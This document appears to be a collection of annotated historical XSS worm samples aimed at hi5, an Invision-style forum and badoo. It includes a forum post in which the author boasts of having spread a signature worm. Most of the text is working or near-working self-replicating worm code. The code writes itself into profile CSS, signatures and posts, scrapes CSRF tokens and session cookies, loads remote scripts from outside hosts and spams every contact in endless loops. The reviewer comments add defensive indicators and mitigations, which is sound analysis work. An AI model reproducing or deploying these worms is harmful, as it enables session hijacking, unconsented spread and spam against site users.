<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml">
<binding id="xs">
<implementation>
<constructor>
// NOTE(review): constructor of the XBL binding "xs" from a 2007-era hi5 XSS
// worm sample, kept here for analysis. It is self-replicating: window.p
// receives the escaped source of this very function, which is then written
// into the victim's own profile style; being stored profile CSS, that style
// presumably runs again in every visitor's browser.
// Points a defender would note, all visible in this block:
//  - window.p doubles as a run-once guard and as the replication payload;
//  - $() appends hidden iframes (height=0) to the profile customization
//    pages, so every action runs inside the victim's authenticated session;
//  - the profile "style" field is given an IE CSS expression(eval(unescape(...)))
//    and a Firefox -moz-binding:url(...#xs), two legacy features that execute
//    script from CSS -- user-supplied CSS containing "expression(" or
//    "-moz-binding" is what a filter must strip and what monitoring should alert on;
//  - the polling loop swallows all errors and is never cleared, so it keeps
//    resubmitting the form every second for the life of the page.
(function q(){
// Append a hidden iframe pointing at u to document.body and return it (relies on `with`).
function $(u,x){with(document)with(body)(x=appendChild(createElement('iframe'))).src=u;return x;}
// Run once per page: window.p is the marker.
if(!window.p){
// Replication payload: the escaped source of q, wrapped as an IIFE.
window.p=escape("("+q+")();");
// Visible marker; alert() on a regex literal displays the regex source text.
alert(/hi5 xss worm wishes you a merry merry xmas/);
// Two hidden frames: reset the current skin, then open the profile style editor.
$("http://www.hi5.com/friend/profile/removeSkin.do").height=0;
$("http://www.hi5.com/friend/account/displayEditProfileCustomization.do").height=0;
// Poll every second and fill in the editor frame; `m` is never cleared with clearInterval.
var m=setInterval(function(){
try{
// Background image field set to a short-link URL (an indicator in its own right).
frames[1].document.forms[0].backgroundImageURL.value="http://www.x.se/ye59";
// The style field carries both payloads: expression() for IE, -moz-binding for Firefox.
frames[1].document.forms[0].style.value="body{width:expression(eval(unescape(\""+window.p+"\")));-moz-binding:url('http://www.sirdarckcat.net/xssworm.xml#xs');}";
frames[1].document.forms[0].submit();
// Reload the editor 2 s later; the still-running interval then submits it again.
setTimeout(function(){frames[1].location="http://www.hi5.com/friend/account/displayEditProfileCustomization.do";},2000);
// Errors (presumably the frame not having loaded yet) are silently ignored -- the reason for polling.
}catch(e){}
},1000);
}
})();
</constructor>
</implementation>
</binding>
</bindings>
I once wrote an XSS worm on a forum, based on a flaw in the forum's JavaScript code (it called unescape on data taken from the user's signature). I had it add its own code, plus a bit of invisible text as a payload, and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have found the source of the problem, because the code was removed (and the worm stopped working after that). I could publish the code if it's of interest.
<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>
// NOTE(review): second sample -- the Invision-style forum signature worm
// referred to in the quote above. As pasted it is collapsed onto two lines and
// the second line contains a garbled fragment (`nxp="+"]";`), so it does not
// parse; read it as a historical sample for analysis, not as runnable code.
// What the visible code does:
//  - `hack` selects a mode ("sig", "post", "pin", "PM"); this sample is set to "sig".
//  - In "sig" mode it GETs the signature editor (act=UserCP&CODE=22), scrapes the
//    anti-CSRF `key` and the current signature out of the HTML with regexes,
//    appends the `post` marker plus the percent-encoded `vector` -- which decodes
//    to an <img> tag whose onload calls loadjs() with a remote text file, loadjs
//    presumably being a function the forum page itself defines -- and POSTs the
//    modified signature back (CODE=23). The `old.indexOf(post)<0` check is the
//    worm's own "already infected" test.
//  - The CSRF token is read straight from the fetched page: tokens only stop
//    cross-origin forgery, not script already running in the user's session,
//    which is why same-origin XSS defeats them.
//  - Indicators present in the sample: the encoded `vector` string, the
//    `eapr-1` anchor used as a carrier marker, and the tinypic.com / fileden.com URLs.
//  - The `Content-length` and `Connection` headers set here are forbidden
//    request headers for XMLHttpRequest and are ignored by browsers.
var req = null; var stage = 0; var hack = "sig"; var url = "http://maple-world.net/"; var member = ""; var forum = ""; var topic = ""; var title = ""; var post = " ~~~~@"; vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E"; if (window.XMLHttpRequest) { req = new XMLHttpRequest(); if (req.overrideMimeType) { req.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } req.onreadystatechange = function() { if(req.readyState == 4) { if(req.status == 200) { if(hack == "post" || hack == "pin") { stage += 1; if(stage==1) { var i = req.responseText.indexOf("auth_key' value='") + 17; auth = req.responseText.substring(i, i + 32); req.open("POST", url + "index.php?", true); if(hack=="post") { var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post; } else if(hack == "pin") { var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic; } req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } else if(hack=="sig") { stage+=1; if(stage==1) { key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1]; old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1]; xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/); if(xpr){ 
if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];} nxp="+"]"; old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp); } if(old.indexOf(post)<0){ parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post); req.open("POST", url + "index.php?", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } } } } }; if(stage==0) { if(hack=="post" || hack=="pin") { req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } else if(hack=="PM") { req.open("POST", url + "index.php?", true); post = encodeURI(post); title = encodeURI(title); var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post; req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } else if(hack=="sig") { req.open("GET", url + "index.php?act=UserCP&CODE=22", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } }
// NOTE(review): third sample -- a 2008-era worm against badoo profile pages,
// written as a flat script. As pasted it does not parse: the line ending
// `"--\r\n";";` carries a stray `";` (likely extraction damage) and the
// `hxxp://` URLs are defanged. Keep it as an analysis sample, not runnable code.
// Behaviour visible in the code:
//  - reads a 32-character cookie value out of document.cookie (so that cookie
//    was readable by script, i.e. not HttpOnly) and the user's profile URL
//    from document.links[6];
//  - on any page that is not the user's own profile, hand-builds a
//    multipart/form-data body and POSTs a new "reportage" entry whose body is
//    a <script> tag that loads a remote script (the replication step);
//  - on the user's own profile, sends a friend request to a hard-coded user id
//    and then messages every listed contact in a 1-second loop with no exit.
// Detection/mitigation points: user content containing a <script> tag or the
// kurl.nl URL, HttpOnly on the session cookie, per-request CSRF tokens (none of
// the POSTs below carry one), and rate limiting on contacts/ws-post.phtml.
var x;
// Random multipart boundary.
b=Math.floor(Math.random()*1000000);
if(window.XMLHttpRequest)
x = new XMLHttpRequest();
else if(window.ActiveXObject)
x = new ActiveXObject("Microsoft.XMLHTTP");
u=document.location; // current URL (a Location object; coerced to a string when concatenated below)
l=document.cookie.split(";");
c=l[2].substring(4,36); // 32-char value of the third cookie, presumably the session id
p=document.links[6].href; // profile page URL
t=(document.links[6].href).split(".");
r=t[0].substring(7,t[0].length); // leading subdomain number; profile URLs look like hxxp://<number>.badoo.com
if(u!=p){ // not on the user's own profile: post a "reportage"; this way a new one is not created on every profile visit
// Hand-built multipart body; every part is "--<b>\r\nContent-Disposition: form-data;name=..." with CRLF line ends.
sh="\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"submit_to\"\r\n\r\n"+p+"entry/0/edit/103?noupload=1\r\n--"+b+"\r\nContent-Disposition:";
// The cookie value is echoed back as form field s1.
sh+="form-data;name=\"s1\"\r\n\r\n"+c+"\r\n--"+b+"\r\nContent-Disposition:";
// Defanged raw-IP upload URL, parameterised by the subdomain number.
sh+="form-data;name=\"upload_ws_url\"\r\n\r\nhxxp://87.245.192.195"+r+"/entry/0/upload/1\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"self_domain\"\r\n\r\n"+p+"\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entry_id\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"day\"\r\n\r\n7\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"month\"\r\n\r\n2\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"year\"\r\n\r\n2008\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_view\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"had_password\"\r\n\r\n0\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"entrypwd\"\r\n\r\n\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"who_comment\"\r\n\r\nAll\r\n--"+b+"\r\nContent-Disposition:";
sh+="form-data;name=\"title\"\r\n\r\nI will become an hero\r\n--"+b+"\r\nContent-Disposition:";
// Entry body: a <script> element whose src is assembled from two strings (a remote loader) -- this is the replication payload.
sh+="form-data;name=\"body\"\r\n\r\n<script>r=document;t=\"http:/\"; s=r.createElement(\"script\"); s.src=t.concat(\"/kurl.nl?1B9E\" );r.body.appendChild(s); </script>";
sh+="\r\n--"+b+"\r\nContent-Disposition:";
// Empty file part, then the "save" button value (URL-encoded French label).
sh+="form-data;name=\"file\";filename=\"\"\r\nContent-Type:";
sh+="application/octet-stream\r\n\r\n--"+b+"\r\nContent-Disposition:";
// NOTE(review): the trailing `";` after the closing quote is a syntax error as pasted.
sh+="form-data;name=\"save\"\r\n\r\nCr%c3%a9er reportage\r\n--"+b+"--\r\n";";
x.open("POST",u+"entry/create/",true); // author's note: badoo accepted the reportage POST from a page other than the user's own
x.setRequestHeader("Content-Length",sh.length); // Content-Length is a forbidden request header for XMLHttpRequest; browsers ignore it
x.setRequestHeader("Content-Type","multipart/form-data; boundary="+b);
x.send(sh);
}else{ // on the user's own profile: send a friend request, then message all of the user's friends
// Hard-coded target user id -- presumably the worm author's own account.
d="user_id=097994444&code=&burl="+p+"contacts/&friendship_type_group[Friend]=1&";
d+="friendship_type[]=Friend&friendship_type[]=FamilyMember&friendship_type[]=ProfessionalContact&submit=Ajouter+dans+la+liste+d%27amis";
x.open("POST",u+"friend/new_request.phtml",true);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d.length);
x.send(d);
// Handler is attached after send(); once the friend request completes, the friends list is fetched synchronously.
x.onreadystatechange=function(){
if(x.readyState==4 && x.status==200){
x.open("GET",u+"friends/",false);
x.send(null);
j=x.responseText;
// Scrape the friends page: `z` (a digit after "has ") is computed but never used;
// `p` is reassigned here from the profile URL string to an array of "uid" fragments.
f=j.split("has ");
z=f[1].substring(0,1);
p=j.split("\"uid");
i=1;
// Function declaration inside a block. Posts one message via the contacts endpoint and
// re-schedules itself every second with no stopping condition; `i` is passed but unused.
// Note `p` is an array at this point, yet `.substring` is called on it.
function A(i){
d2="s1="+c+"&contact_user_id=0"+p.substring(0,8)+"&action=add&message=Come see my new pictures Kisss&flash=1";
x.open("POST",u+"contacts/ws-post.phtml",false);
x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
x.setRequestHeader("Content-Length",d2.length);
x.send(d2);
setTimeout(function(){A(i+1)},1000);
}
A(i);
}
}
}